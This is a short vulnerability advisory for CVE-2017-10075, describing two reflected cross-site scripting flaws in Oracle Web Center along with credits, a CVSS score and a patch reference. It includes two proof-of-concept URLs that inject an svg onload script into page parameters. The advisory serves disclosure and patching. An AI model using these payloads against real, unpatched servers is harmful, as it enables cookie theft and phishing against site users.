Oracle Web Center 11.1.1.9.0 / 12.2.1.1.0 / 12.2.1.2.0 XSSOracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2
Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana
Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.
Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>
Solution
========================================================================================
Apply Oracle CPU July 2017
--
Regards,
Owais Mehtab & Tayeeb Rana
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum